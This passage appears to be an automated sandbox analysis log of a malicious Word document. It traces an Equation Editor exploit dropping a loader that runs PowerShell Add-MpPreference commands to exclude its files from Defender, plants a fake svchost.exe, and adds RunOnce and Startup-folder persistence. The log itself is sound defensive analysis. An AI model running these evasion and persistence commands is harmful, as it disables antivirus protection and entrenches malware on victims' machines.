Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Allignright_companyprofile.docReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknownProcess created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: Allignright_companyprofile.docStatic file information: File size 2960089 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: mad[1].exe.2.drStatic PE information: 0x84B8EC41 [Tue Jul 24 03:00:17 2040 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02863876 pushfd ; retf 0071h5_2_02863881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0288117C push 71CB3989h; retf 7_2_02881202
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_02BE0590 push edx; ret 32_2_02BE05B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_02BE0720 push esi; ret 32_2_02BE07EB

Persistence and Installation Behavior:

barindex
Drops PE files with benign system namesShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: unknownExecutable created and started: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Drops PE files to the startup folderShow sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
